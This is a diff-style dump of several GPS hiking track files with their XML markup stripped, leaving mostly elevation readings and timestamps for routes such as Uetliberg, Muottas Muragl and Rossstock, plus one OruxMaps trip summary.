+
+1643.21
+2014-12-30T08:05:26Z
+
+
+1657.03
+2014-12-30T08:06:57Z
+
+
+1676.87
+2014-12-30T08:09:08Z
+
+
+1692.86
+2014-12-30T08:11:34Z
+
+
+1668.54
+2014-12-30T08:14:06Z
+
+
+1682.06
+2014-12-30T08:17:38Z
+
+
+1693.92
+2014-12-30T08:19:01Z
+
+
+1700.26
+2014-12-30T08:19:33Z
+
+
+1712.41
+2014-12-30T08:20:47Z
+
+
+1727.46
+2014-12-30T08:22:15Z
+
+
+1747.04
+2014-12-30T08:24:00Z
+
+
+1758.91
+2014-12-30T08:25:15Z
+
+
+1769.92
+2014-12-30T08:26:45Z
+
+
+1782.27
+2014-12-30T08:27:56Z
+
+
+1797.23
+2014-12-30T08:29:35Z
+
+
+1811.47
+2014-12-30T08:30:59Z
+
+
+1825.85
+2014-12-30T08:32:15Z
+
+
+1837.06
+2014-12-30T08:33:19Z
+
+
+1853.57
+2014-12-30T08:35:16Z
+
+
+1893.33
+2014-12-30T08:39:28Z
+
+
+1958.15
+2014-12-30T08:45:53Z
+
+
+1992.08
+2014-12-30T08:50:20Z
+
+
+2023.92
+2014-12-30T08:53:41Z
+
+
+2032.12
+2014-12-30T08:54:24Z
+
+
+2041.12
+2014-12-30T08:55:09Z
+
+
+2046.98
+2014-12-30T08:55:48Z
+
+
+2050.19
+2014-12-30T09:10:32Z
+
+
+2086.7
+2014-12-30T09:12:58Z
+
+
+2109.91
+2014-12-30T09:15:51Z
+
+
+2111.88
+2014-12-30T09:19:22Z
+
+
+2133.89
+2014-12-30T09:23:07Z
+
+
+2159.87
+2014-12-30T09:26:23Z
+
+
+2192.46
+2014-12-30T09:29:41Z
+
+
+2203.11
+2014-12-30T09:36:22Z
+
+
+2225.23
+2014-12-30T09:42:05Z
+
+
+2235.77
+2014-12-30T09:43:15Z
+
+
+2314.68
+2014-12-30T09:50:01Z
+
+
+2388.29
+2014-12-30T09:56:36Z
+
+
+2421.36
+2014-12-30T09:59:47Z
+
+
+2445.54
+2014-12-30T10:02:03Z
+
+
+2477.06
+2014-12-30T10:04:52Z
+
+
+2506.05
+2014-12-30T10:11:16Z
+
+
+2546.84
+2014-12-30T10:14:51Z
+
+
+2621.48
+2014-12-30T10:22:15Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-11-01T19:48:23Z
+
+
+2016-11-01 15:56:58
+
+
+
+
+
+
+312.55
+2016-11-01T10:41:18Z
+
+
+313.64
+2016-11-01T10:42:50Z
+
+
+313.79
+2016-11-01T10:43:38Z
+
+
+315.31
+2016-11-01T10:45:11Z
+
+
+319.49
+2016-11-01T10:46:57Z
+
+
+325.27
+2016-11-01T10:48:34Z
+
+
+345.38
+2016-11-01T10:53:21Z
+
+
+370.54
+2016-11-01T10:57:01Z
+
+
+377.77
+2016-11-01T10:58:03Z
+
+
+404.65
+2016-11-01T11:01:53Z
+
+
+408.44
+2016-11-01T11:02:48Z
+
+
+415.87
+2016-11-01T11:04:36Z
+
+
+430.78
+2016-11-01T11:06:48Z
+
+
+437.57
+2016-11-01T11:08:36Z
+
+
+443.26
+2016-11-01T11:11:18Z
+
+
+446.47
+2016-11-01T11:12:25Z
+
+
+444.6
+2016-11-01T11:13:40Z
+
+
+449.58
+2016-11-01T11:16:52Z
+
+
+455.33
+2016-11-01T11:18:23Z
+
+
+450.9
+2016-11-01T11:20:24Z
+
+
+445.66
+2016-11-01T11:22:33Z
+
+
+447.06
+2016-11-01T11:23:30Z
+
+
+444.76
+2016-11-01T11:24:30Z
+
+
+445.72
+2016-11-01T11:25:51Z
+
+
+412.94
+2016-11-01T13:09:16Z
+
+
+414.02
+2016-11-01T13:12:11Z
+
+
+421.61
+2016-11-01T13:13:21Z
+
+
+434.34
+2016-11-01T13:15:03Z
+
+
+456.23
+2016-11-01T13:24:55Z
+
+
+461.21
+2016-11-01T13:26:59Z
+
+
+457.97
+2016-11-01T13:30:54Z
+
+
+455.12
+2016-11-01T13:33:51Z
+
+
+451.8
+2016-11-01T13:35:30Z
+
+
+444.21
+2016-11-01T13:37:23Z
+
+
+433.05
+2016-11-01T13:39:08Z
+
+
+420.47
+2016-11-01T13:41:42Z
+
+
+414.78
+2016-11-01T13:43:23Z
+
+
+410.62
+2016-11-01T13:44:57Z
+
+
+409.46
+2016-11-01T13:45:49Z
+
+
+403.0
+2016-11-01T13:47:24Z
+
+
+383.36
+2016-11-01T13:50:32Z
+
+
+381.14
+2016-11-01T13:51:26Z
+
+
+382.56
+2016-11-01T13:51:58Z
+
+
+391.24
+2016-11-01T13:54:31Z
+
+
+393.31
+2016-11-01T13:56:11Z
+
+
+382.01
+2016-11-01T14:01:25Z
+
+
+390.38
+2016-11-01T14:04:45Z
+
+
+385.46
+2016-11-01T14:06:01Z
+
+
+382.52
+2016-11-01T14:09:12Z
+
+
+371.51
+2016-11-01T14:19:19Z
+
+
+365.15
+2016-11-01T14:23:37Z
+
+
+358.92
+2016-11-01T14:24:30Z
+
+
+351.86
+2016-11-01T14:34:00Z
+
+
+356.42
+2016-11-01T14:35:50Z
+
+
+359.11
+2016-11-01T14:37:39Z
+
+
+354.85
+2016-11-01T14:39:10Z
+
+
+344.73
+2016-11-01T14:41:21Z
+
+
+335.38
+2016-11-01T14:42:52Z
+
+
+326.07
+2016-11-01T14:45:38Z
+
+
+324.65
+2016-11-01T14:46:17Z
+
+
+328.7
+2016-11-01T14:47:52Z
+
+
+334.71
+2016-11-01T14:48:56Z
+
+
+327.73
+2016-11-01T14:49:56Z
+
+
+316.96
+2016-11-01T14:51:48Z
+
+
+315.45
+2016-11-01T14:52:40Z
+
+
+314.15
+2016-11-01T14:55:30Z
+
+
+313.61
+2016-11-01T14:56:42Z
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2014-04-13T17:48:10Z
+
+GPSies Track on GPSies.com
+
+
+1093.0
+2010-01-01T00:00:00Z
+
+
+1093.0
+2010-01-01T00:00:03Z
+
+
+1093.0
+2010-01-01T00:00:15Z
+
+
+1093.0
+2010-01-01T00:00:39Z
+
+
+1094.0
+2010-01-01T00:01:16Z
+
+
+1096.0
+2010-01-01T00:01:38Z
+
+
+1098.0
+2010-01-01T00:01:57Z
+
+
+1103.0
+2010-01-01T00:02:24Z
+
+
+1107.0
+2010-01-01T00:02:43Z
+
+
+1115.0
+2010-01-01T00:03:08Z
+
+
+1118.0
+2010-01-01T00:03:18Z
+
+
+1134.0
+2010-01-01T00:03:52Z
+
+
+1143.0
+2010-01-01T00:04:06Z
+
+
+1150.0
+2010-01-01T00:04:29Z
+
+
+1174.0
+2010-01-01T00:05:03Z
+
+
+1198.0
+2010-01-01T00:05:45Z
+
+
+1214.0
+2010-01-01T00:06:12Z
+
+
+1228.0
+2010-01-01T00:06:34Z
+
+
+1250.0
+2010-01-01T00:07:09Z
+
+
+1279.0
+2010-01-01T00:07:53Z
+
+
+1301.0
+2010-01-01T00:08:21Z
+
+
+1317.0
+2010-01-01T00:08:45Z
+
+
+1325.0
+2010-01-01T00:08:57Z
+
+
+1331.0
+2010-01-01T00:09:06Z
+
+
+1349.0
+2010-01-01T00:09:29Z
+
+
+1368.0
+2010-01-01T00:09:53Z
+
+
+1375.0
+2010-01-01T00:10:01Z
+
+
+1382.0
+2010-01-01T00:10:08Z
+
+
+1385.0
+2010-01-01T00:10:15Z
+
+
+1392.0
+2010-01-01T00:10:22Z
+
+
+1401.0
+2010-01-01T00:10:31Z
+
+
+1418.0
+2010-01-01T00:10:52Z
+
+
+1429.0
+2010-01-01T00:11:00Z
+
+
+1447.0
+2010-01-01T00:11:19Z
+
+
+1450.0
+2010-01-01T00:11:26Z
+
+
+1454.0
+2010-01-01T00:11:32Z
+
+
+1469.0
+2010-01-01T00:11:57Z
+
+
+1472.0
+2010-01-01T00:12:05Z
+
+
+1482.0
+2010-01-01T00:12:22Z
+
+
+1487.0
+2010-01-01T00:12:31Z
+
+
+1495.0
+2010-01-01T00:12:41Z
+
+
+1514.0
+2010-01-01T00:13:00Z
+
+
+1535.0
+2010-01-01T00:13:13Z
+
+
+1559.0
+2010-01-01T00:13:35Z
+
+
+1578.0
+2010-01-01T00:13:42Z
+
+
+1591.0
+2010-01-01T00:13:54Z
+
+
+1588.0
+2010-01-01T00:14:12Z
+
+
+1615.0
+2010-01-01T00:14:27Z
+
+
+1628.0
+2010-01-01T00:14:38Z
+
+
+1638.0
+2010-01-01T00:14:53Z
+
+
+1664.0
+2010-01-01T00:15:04Z
+
+
+1678.0
+2010-01-01T00:15:11Z
+
+
+1683.0
+2010-01-01T00:15:20Z
+
+
+1697.0
+2010-01-01T00:15:28Z
+
+
+1703.0
+2010-01-01T00:15:35Z
+
+
+1712.0
+2010-01-01T00:15:48Z
+
+
+1725.0
+2010-01-01T00:15:55Z
+
+
+1729.0
+2010-01-01T00:16:02Z
+
+
+1736.0
+2010-01-01T00:16:19Z
+
+
+1749.0
+2010-01-01T00:16:45Z
+
+
+1779.0
+2010-01-01T00:17:07Z
+
+
+1794.0
+2010-01-01T00:17:15Z
+
+
+1798.0
+2010-01-01T00:17:31Z
+
+
+1806.0
+2010-01-01T00:17:45Z
+
+
+1807.0
+2010-01-01T00:17:56Z
+
+
+1806.0
+2010-01-01T00:18:05Z
+ "
+"
+
+
+Tourenplanung am 22. Juli 2016
+
+TemporaryUserGroup
+
+
+
+2016-07-22T10:31:32Z
+
+Tourenplanung am 22. Juli 2016
+
+
+
+261.1
+
+
+262.2
+
+
+262.7
+
+
+265.0
+
+
+266.6
+
+
+268.2
+
+
+273.4
+
+
+276.6
+
+
+279.3
+
+
+282.2
+
+
+268.0
+
+
+268.6
+
+
+265.9
+
+
+276.3
+
+
+276.5
+
+
+279.4
+
+
+280.0
+
+
+283.8
+
+
+280.1
+
+
+285.3
+
+
+288.5
+
+
+291.1
+
+
+290.5
+
+
+293.8
+
+
+308.4
+
+
+307.2
+
+
+306.6
+
+
+314.9
+
+
+309.6
+
+
+298.0
+
+
+294.7
+
+
+281.4
+
+
+279.3
+
+
+276.6
+
+
+273.4
+
+
+268.2
+
+
+266.6
+
+
+265.0
+
+
+262.7
+
+
+262.2
+
+
+261.1
+ "
+"
+
+
+
+
+
+
+
+2015-11-28 17:12:04
+
+
+
+1463.69995117188
+2015-11-28T13:19:21Z
+
+
+1464.69995117188
+2015-11-28T13:19:48Z
+
+
+1466.63000488281
+2015-11-28T13:20:38Z
+
+
+1516.14001464844
+2015-11-28T13:24:59Z
+
+
+1526.7099609375
+2015-11-28T13:26:09Z
+
+
+1529.58996582031
+2015-11-28T13:27:27Z
+
+
+1539.2099609375
+2015-11-28T13:28:33Z
+
+
+1555.55004882812
+2015-11-28T13:29:55Z
+
+
+1574.30004882812
+2015-11-28T13:33:08Z
+
+
+1586.31005859375
+2015-11-28T13:34:38Z
+
+
+1589.68005371094
+2015-11-28T13:36:07Z
+
+
+1622.35998535156
+2015-11-28T13:39:19Z
+
+
+1650.23999023438
+2015-11-28T13:42:02Z
+
+
+1672.34997558594
+2015-11-28T13:44:20Z
+
+
+1683.89001464844
+2015-11-28T13:45:43Z
+
+
+1705.0400390625
+2015-11-28T13:48:01Z
+
+
+1723.78002929688
+2015-11-28T13:49:52Z
+
+
+1737.71997070312
+2015-11-28T13:51:15Z
+
+
+1755.98999023438
+2015-11-28T13:53:01Z
+
+
+1780.02001953125
+2015-11-28T13:55:19Z
+
+
+1788.67004394531
+2015-11-28T14:01:17Z
+
+
+1792.52001953125
+2015-11-28T14:02:31Z
+
+
+1795.88000488281
+2015-11-28T14:03:23Z
+
+
+1801.65002441406
+2015-11-28T14:04:10Z
+
+
+1821.83996582031
+2015-11-28T14:06:29Z
+
+
+1838.66003417969
+2015-11-28T14:08:21Z
+
+
+1862.2099609375
+2015-11-28T14:10:57Z
+
+
+1865.57995605469
+2015-11-28T14:12:08Z
+
+
+1875.67004394531
+2015-11-28T14:13:05Z
+
+
+1885.76000976562
+2015-11-28T14:14:04Z
+
+
+1898.26000976562
+2015-11-28T14:15:51Z
+
+
+1911.23999023438
+2015-11-28T14:17:30Z
+
+
+1938.64001464844
+2015-11-28T14:20:54Z
+
+
+1943.43994140625
+2015-11-28T14:21:29Z
+
+
+1954.97998046875
+2015-11-28T14:22:39Z
+
+
+1962.67004394531
+2015-11-28T14:23:56Z
+
+
+1965.55004882812
+2015-11-28T14:49:58Z
+
+
+1978.53002929688
+2015-11-28T14:51:15Z
+
+
+1994.39001464844
+2015-11-28T14:52:20Z
+
+
+2002.56005859375
+2015-11-28T14:53:10Z
+
+
+2023.7099609375
+2015-11-28T14:55:15Z
+
+
+2039.56994628906
+2015-11-28T14:56:46Z
+
+
+2086.19995117188
+2015-11-28T15:00:47Z
+
+
+2110.10009765625
+2015-11-28T15:51:00Z
+
+
+2077.07006835938
+2015-11-28T15:53:51Z
+
+
+2062.169921875
+2015-11-28T15:54:59Z
+
+
+2036.2099609375
+2015-11-28T15:57:17Z
+
+
+2020.82995605469
+2015-11-28T15:58:43Z
+
+
+2014.57995605469
+2015-11-28T16:00:51Z
+
+
+2004.48999023438
+2015-11-28T16:01:41Z
+
+
+1998.23999023438
+2015-11-28T16:02:51Z
+
+
+1988.14001464844
+2015-11-28T16:04:05Z
+
+
+1988.61999511719
+2015-11-28T16:07:12Z
+
+
+1976.60998535156
+2015-11-28T16:08:48Z
+
+
+1956.80004882812
+2015-11-28T16:11:11Z
+ "
+"
+
+
+Le Brandou
+
+Monika Teusch - Community
+
+
+
+2016-04-17T17:17:41Z
+
+Le Brandou
+
+
+
+177.2014
+
+
+181.46751
+
+
+186.62779
+
+
+190.34917
+
+
+192.61247
+
+
+196.02367
+
+
+197.14293
+
+
+199.08238
+
+
+206.08592
+
+
+207.34496
+
+
+210.09374
+
+
+213.02599
+
+
+227.08934
+
+
+234.75133
+
+
+242.26195
+
+
+259.68462
+
+
+263.05772
+
+
+270.93614
+
+
+280.27513
+
+
+286.97752
+
+
+290.60857
+
+
+309.79137
+
+
+311.95049
+
+
+312.69408
+
+
+313.50127
+
+
+326.02672
+
+
+326.59044
+
+
+326.74748
+
+
+326.04112
+
+
+321.17162
+
+
+317.26683
+
+
+314.78905
+
+
+311.09764
+
+
+313.62547
+
+
+318.80162
+
+
+319.71733
+
+
+331.77977
+
+
+330.192
+
+
+314.03172
+
+
+323.16905
+
+
+308.49596
+
+
+298.46733
+
+
+296.49699
+
+
+290.39012
+
+
+290.6682
+
+
+288.94115
+
+
+305.82427
+
+
+310.01329
+
+
+307.94603
+
+
+327.34032
+
+
+336.74229
+
+
+351.11034
+
+
+362.26012
+
+
+361.26152
+
+
+360.54186
+
+
+355.21947
+
+
+357.6057
+
+
+365.78868
+
+
+364.50218
+
+
+362.1118
+
+
+361.76146
+
+
+378.91155
+
+
+385.10033
+
+
+396.60362
+
+
+399.72789
+
+
+414.92967
+
+
+420.12376
+
+
+422.47258
+
+
+434.94139
+
+
+431.61723
+
+
+437.19115
+
+
+436.18187
+
+
+443.65672
+
+
+443.09581
+
+
+453.13329
+
+
+454.95519
+
+
+464.44438
+
+
+486.5388
+
+
+503.78453
+
+
+505.60484
+
+
+507.02049
+
+
+520.77635
+
+
+520.07726
+
+
+492.72557
+
+
+475.13475
+
+
+468.66692
+
+
+466.11095
+
+
+464.10112
+ "
+"
+
+
+Emeindra
+
+
+
+
+
+OruxMaps
+2016-06-02T09:57:08Z
+
+
+Emeindra
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Emeindra</h2><br /><p>Startzeit: 06/02/2016 11:56</p><p>Zielzeit: 06/02/2016 13:36</p><p>Strecke: 5,3km (01:39)</p><p>Bewegungszeit: 01:15</p><p>Ø-Geschwindigkeit: 3,2km/h</p><p>Netto-Geschwindigkeit: 4,2km/h</p><p>Max. Geschwindigkeit: 7,8km/h</p><p>Minimale Höhe: 981m</p><p>Maximale Höhe: 1490m</p><p>Steig-Geschw.: 437,9m/h</p><p>Sink-Geschw.: -397m/h</p><p>Aufstieg: 565m</p><p>Abstieg: -56m</p><p>Steigzeit: 01:17</p><p>Sinkzeit: 00:08</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+981.44
+2016-06-02T09:56:47Z
+
+
+987.13
+2016-06-02T09:57:13Z
+
+
+990.85
+2016-06-02T09:58:09Z
+
+
+998.88
+2016-06-02T09:58:44Z
+
+
+998.87
+2016-06-02T10:00:30Z
+
+
+1006.88
+2016-06-02T10:01:16Z
+
+
+1005.13
+2016-06-02T10:03:19Z
+
+
+1014.97
+2016-06-02T10:05:26Z
+
+
+1014.75
+2016-06-02T10:06:05Z
+
+
+1019.21
+2016-06-02T10:06:44Z
+
+
+1025.82
+2016-06-02T10:09:26Z
+
+
+1033.4
+2016-06-02T10:10:30Z
+
+
+1034.26
+2016-06-02T10:11:40Z
+
+
+1034.04
+2016-06-02T10:12:21Z
+
+
+1054.75
+2016-06-02T10:15:32Z
+
+
+1060.89
+2016-06-02T10:16:35Z
+
+
+1074.61
+2016-06-02T10:18:30Z
+
+
+1089.83
+2016-06-02T10:19:53Z
+
+
+1085.27
+2016-06-02T10:20:39Z
+
+
+1086.67
+2016-06-02T10:21:24Z
+
+
+1089.9
+2016-06-02T10:23:05Z
+
+
+1110.01
+2016-06-02T10:24:06Z
+
+
+1153.5
+2016-06-02T10:31:04Z
+
+
+1188.85
+2016-06-02T10:36:51Z
+
+
+1191.28
+2016-06-02T10:37:42Z
+
+
+1207.24
+2016-06-02T10:41:55Z
+
+
+1214.88
+2016-06-02T10:43:58Z
+
+
+1223.41
+2016-06-02T10:45:06Z
+
+
+1238.75
+2016-06-02T10:48:25Z
+
+
+1302.41
+2016-06-02T10:57:43Z
+
+
+1320.76
+2016-06-02T11:00:05Z
+
+
+1330.37
+2016-06-02T11:02:14Z
+
+
+1331.0
+2016-06-02T11:03:46Z
+
+
+1332.77
+2016-06-02T11:05:41Z
+
+
+1329.89
+2016-06-02T11:05:57Z
+
+
+1344.24
+2016-06-02T11:06:39Z
+
+
+1349.81
+2016-06-02T11:09:33Z
+
+
+1343.01
+2016-06-02T11:11:54Z
+
+
+1349.0
+2016-06-02T11:14:18Z
+
+
+1351.91
+2016-06-02T11:15:24Z
+
+
+1358.01
+2016-06-02T11:16:11Z
+
+
+1377.81
+2016-06-02T11:20:07Z
+
+
+1391.97
+2016-06-02T11:22:59Z
+
+
+1420.73
+2016-06-02T11:25:36Z
+
+
+1433.37
+2016-06-02T11:27:40Z
+
+
+1385.88
+2016-06-02T11:29:05Z
+
+
+1431.87
+2016-06-02T11:29:36Z
+
+
+1479.79
+2016-06-02T11:33:49Z
+
+
+1488.22
+2016-06-02T11:35:56Z
+
+
+1486.94
+2016-06-02T11:36:36Z
+ "
+"
+
+
+
+
+
+
+
+Acquaviva1
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin Connect
+2015-12-19T08:46:16Z
+
+Muottas Muragl
+
+
+
+1786.5999755859375
+2015-12-19T08:46:16Z
+
+
+1789.800048828125
+2015-12-19T08:46:46Z
+
+
+1814.800048828125
+2015-12-19T08:49:00Z
+
+
+1843.5999755859375
+2015-12-19T08:51:20Z
+
+
+1877.5999755859375
+2015-12-19T08:54:47Z
+
+
+1893.4000244140625
+2015-12-19T08:56:18Z
+
+
+1907.800048828125
+2015-12-19T08:57:14Z
+
+
+1926.199951171875
+2015-12-19T08:58:35Z
+
+
+1929.800048828125
+2015-12-19T08:59:04Z
+
+
+1927.5999755859375
+2015-12-19T09:00:57Z
+
+
+1951.199951171875
+2015-12-19T09:02:37Z
+
+
+1952.4000244140625
+2015-12-19T09:03:46Z
+
+
+1959.0
+2015-12-19T09:04:21Z
+
+
+1969.5999755859375
+2015-12-19T09:05:09Z
+
+
+1977.5999755859375
+2015-12-19T09:06:32Z
+
+
+2041.4000244140625
+2015-12-19T09:09:06Z
+
+
+2038.0
+2015-12-19T09:10:37Z
+
+
+2057.199951171875
+2015-12-19T09:12:44Z
+
+
+2072.0
+2015-12-19T09:13:27Z
+
+
+2072.39990234375
+2015-12-19T09:14:39Z
+
+
+2111.0
+2015-12-19T09:18:09Z
+
+
+2122.39990234375
+2015-12-19T09:18:58Z
+
+
+2191.800048828125
+2015-12-19T09:23:14Z
+
+
+2168.60009765625
+2015-12-19T09:25:54Z
+
+
+2165.199951171875
+2015-12-19T09:26:16Z
+
+
+2212.39990234375
+2015-12-19T09:27:49Z
+
+
+2191.39990234375
+2015-12-19T09:29:06Z
+
+
+2209.39990234375
+2015-12-19T09:29:55Z
+
+
+2212.800048828125
+2015-12-19T09:32:20Z
+
+
+2229.800048828125
+2015-12-19T09:34:36Z
+
+
+2260.39990234375
+2015-12-19T09:36:58Z
+
+
+2268.199951171875
+2015-12-19T09:39:01Z
+
+
+2289.39990234375
+2015-12-19T09:40:43Z
+
+
+2313.60009765625
+2015-12-19T09:42:24Z
+
+
+2341.39990234375
+2015-12-19T09:43:54Z
+
+
+2354.800048828125
+2015-12-19T09:46:24Z
+
+
+2387.39990234375
+2015-12-19T09:48:36Z
+
+
+2395.39990234375
+2015-12-19T09:49:43Z
+
+
+2403.199951171875
+2015-12-19T09:50:11Z
+
+
+2408.39990234375
+2015-12-19T09:52:14Z
+
+
+2426.60009765625
+2015-12-19T09:53:38Z
+
+
+2443.800048828125
+2015-12-19T09:54:52Z
+
+
+2451.60009765625
+2015-12-19T09:57:06Z
+ "
+"
+
+
+
+
+
+
+
+Linie
+
+
+
+1708.5
+
+
+1708.7
+
+
+1708.7
+
+
+1706.9
+
+
+1707.3
+
+
+1708.2
+
+
+1709.0
+
+
+1709.7
+
+
+1712.8
+
+
+1715.6
+
+
+1714.0
+
+
+1714.0
+
+
+1714.7
+
+
+1716.0
+
+
+1717.0
+
+
+1721.4
+
+
+1717.1
+
+
+1717.8
+
+
+1718.2
+
+
+1718.4
+
+
+1727.8
+
+
+1725.0
+
+
+1720.9
+
+
+1727.6
+
+
+1725.2
+
+
+1718.5
+
+
+1718.0
+
+
+1714.3
+
+
+1714.5
+
+
+1709.0
+
+
+1709.5
+
+
+1709.3
+
+
+1708.9
+
+
+1709.6
+
+
+1706.3
+
+
+1704.9
+
+
+1700.0
+
+
+1700.3
+
+
+1702.0
+
+
+1703.6
+
+
+1707.3
+
+
+1704.7
+
+
+1703.6
+
+
+1700.6
+
+
+1698.8
+
+
+1700.5
+
+
+1696.3
+
+
+1696.0
+
+
+1695.7
+
+
+1695.9
+
+
+1694.9
+
+
+1703.0
+
+
+1699.3
+
+
+1694.6
+
+
+1695.7
+
+
+1695.0
+
+
+1697.3
+
+
+1699.8
+
+
+1703.2
+
+
+1706.3
+
+
+1708.9
+
+
+1710.8
+
+
+1711.8
+
+
+1712.4
+
+
+1720.3
+
+
+1731.4
+
+
+1727.0
+
+
+1733.0
+
+
+1734.4
+
+
+1738.6
+
+
+1742.5
+
+
+1747.7
+
+
+1754.9
+
+
+1756.8
+
+
+1760.4
+
+
+1760.9
+
+
+1770.3
+
+
+1764.7
+
+
+1759.1
+
+
+1757.3
+
+
+1751.8
+
+
+1756.8
+
+
+1754.8
+
+
+1753.2
+
+
+1744.1
+
+
+1747.0
+
+
+1738.5
+
+
+1735.9
+
+
+1730.9
+
+
+1727.6
+
+
+1726.1
+
+
+1729.5
+
+
+1712.0
+
+
+1708.3
+
+
+1708.5
+ "
+"
+
+
+Uetliberg
+
+
+
+
+
+
+Uetliberg
+
+
+Walking
+
+c0c0c0
+
+
+524.0
+2014-04-23T15:28:04Z
+
+
+537.0
+2014-04-23T15:28:06Z
+
+
+543.0
+2014-04-23T15:28:10Z
+
+
+518.0
+2014-04-23T15:28:11Z
+
+
+523.0
+2014-04-23T15:29:04Z
+
+
+523.0
+2014-04-23T15:29:37Z
+
+
+525.0
+2014-04-23T15:30:45Z
+
+
+530.0
+2014-04-23T15:32:31Z
+
+
+550.0
+2014-04-23T15:34:53Z
+
+
+551.0
+2014-04-23T15:36:51Z
+
+
+561.0
+2014-04-23T15:37:14Z
+
+
+581.0
+2014-04-23T15:40:09Z
+
+
+587.0
+2014-04-23T15:41:08Z
+
+
+611.0
+2014-04-23T15:43:15Z
+
+
+621.0
+2014-04-23T15:43:40Z
+
+
+614.0
+2014-04-23T15:46:08Z
+
+
+640.0
+2014-04-23T15:46:53Z
+
+
+650.0
+2014-04-23T15:47:16Z
+
+
+673.0
+2014-04-23T15:50:46Z
+
+
+682.0
+2014-04-23T15:52:10Z
+
+
+684.0
+2014-04-23T15:54:18Z
+
+
+707.0
+2014-04-23T15:55:31Z
+
+
+709.0
+2014-04-23T15:56:36Z
+
+
+701.0
+2014-04-23T15:56:58Z
+
+
+725.0
+2014-04-23T15:59:03Z
+
+
+729.0
+2014-04-23T15:59:23Z
+
+
+734.0
+2014-04-23T16:01:11Z
+
+
+773.0
+2014-04-23T16:04:19Z
+
+
+778.0
+2014-04-23T16:05:07Z
+
+
+797.0
+2014-04-23T16:05:52Z
+
+
+784.0
+2014-04-23T16:06:31Z
+
+
+797.0
+2014-04-23T16:07:37Z
+
+
+820.0
+2014-04-23T16:08:43Z
+
+
+846.0
+2014-04-23T16:09:39Z
+
+
+854.0
+2014-04-23T16:10:34Z
+
+
+851.0
+2014-04-23T16:11:01Z
+
+
+879.0
+2014-04-23T16:14:00Z
+
+
+899.0
+2014-04-23T16:21:02Z
+
+
+872.0
+2014-04-23T16:22:32Z
+
+
+855.0
+2014-04-23T16:24:01Z
+
+
+840.0
+2014-04-23T16:24:44Z
+
+
+829.0
+2014-04-23T16:26:00Z
+
+
+832.0
+2014-04-23T16:26:16Z
+
+
+827.0
+2014-04-23T16:26:51Z
+
+
+824.0
+2014-04-23T16:27:41Z
+
+
+828.0
+2014-04-23T16:28:13Z
+
+
+817.0
+2014-04-23T16:29:42Z
+
+
+810.0
+2014-04-23T16:29:51Z
+
+
+805.0
+2014-04-23T16:31:05Z
+
+
+797.0
+2014-04-23T16:31:23Z
+
+
+791.0
+2014-04-23T16:31:46Z
+
+
+793.0
+2014-04-23T16:32:09Z
+
+
+786.0
+2014-04-23T16:32:45Z
+
+
+742.0
+2014-04-23T16:35:07Z
+
+
+729.0
+2014-04-23T16:35:22Z
+
+
+759.0
+2014-04-23T16:35:55Z
+
+
+721.0
+2014-04-23T16:36:39Z
+
+
+717.0
+2014-04-23T16:36:56Z
+
+
+706.0
+2014-04-23T16:37:38Z
+
+
+694.0
+2014-04-23T16:38:23Z
+
+
+684.0
+2014-04-23T16:39:02Z
+
+
+704.0
+2014-04-23T16:39:32Z
+
+
+688.0
+2014-04-23T16:39:51Z
+
+
+684.0
+2014-04-23T16:40:21Z
+
+
+669.0
+2014-04-23T16:41:04Z
+
+
+673.0
+2014-04-23T16:41:26Z
+
+
+658.0
+2014-04-23T16:41:53Z
+
+
+625.0
+2014-04-23T16:43:05Z
+
+
+615.0
+2014-04-23T16:43:34Z
+
+
+591.0
+2014-04-23T16:44:48Z
+
+
+583.0
+2014-04-23T16:46:15Z
+
+
+559.0
+2014-04-23T16:48:14Z
+
+
+556.0
+2014-04-23T16:49:43Z
+
+
+545.0
+2014-04-23T16:50:22Z
+
+
+528.0
+2014-04-23T16:52:48Z
+
+
+534.0
+2014-04-23T16:53:38Z
+
+
+526.0
+2014-04-23T16:54:25Z
+
+
+522.0
+2014-04-23T16:55:35Z
+
+
+522.0
+2014-04-23T16:55:56Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-10-19T16:07:43Z
+
+
+Rossstock - Wanderung
+
+
+
+
+
+
+1647.837158203125
+2017-10-18T08:12:01Z
+
+
+1691.09619140625
+2017-10-18T08:12:56Z
+
+
+1697.344970703125
+2017-10-18T08:13:45Z
+
+
+1710.32275390625
+2017-10-18T08:16:07Z
+
+
+1718.974609375
+2017-10-18T08:17:00Z
+
+
+1730.510498046875
+2017-10-18T08:18:11Z
+
+
+1738.681640625
+2017-10-18T08:19:21Z
+
+
+1742.04638671875
+2017-10-18T08:19:50Z
+
+
+1739.162109375
+2017-10-18T08:20:27Z
+
+
+1739.642822265625
+2017-10-18T08:20:59Z
+
+
+1746.852783203125
+2017-10-18T08:23:24Z
+
+
+1750.697998046875
+2017-10-18T08:24:39Z
+
+
+1775.6923828125
+2017-10-18T08:27:39Z
+
+
+1786.266845703125
+2017-10-18T08:29:10Z
+
+
+1789.15087890625
+2017-10-18T08:30:30Z
+
+
+1792.034912109375
+2017-10-18T08:40:55Z
+
+
+1805.0126953125
+2017-10-18T08:42:20Z
+
+
+1816.54833984375
+2017-10-18T08:44:24Z
+
+
+1818.470947265625
+2017-10-18T08:44:45Z
+
+
+1831.929443359375
+2017-10-18T08:46:33Z
+
+
+1842.984619140625
+2017-10-18T08:48:16Z
+
+
+1861.249755859375
+2017-10-18T08:50:23Z
+
+
+1874.708251953125
+2017-10-18T08:52:11Z
+
+
+1891.53125
+2017-10-18T08:54:19Z
+
+
+1899.702392578125
+2017-10-18T08:55:32Z
+
+
+1903.067138671875
+2017-10-18T08:55:57Z
+
+
+1922.774169921875
+2017-10-18T08:58:13Z
+
+
+1936.232666015625
+2017-10-18T09:03:14Z
+
+
+1955.458984375
+2017-10-18T09:05:29Z
+
+
+1967.9560546875
+2017-10-18T09:06:53Z
+
+
+1984.779296875
+2017-10-18T09:09:11Z
+
+
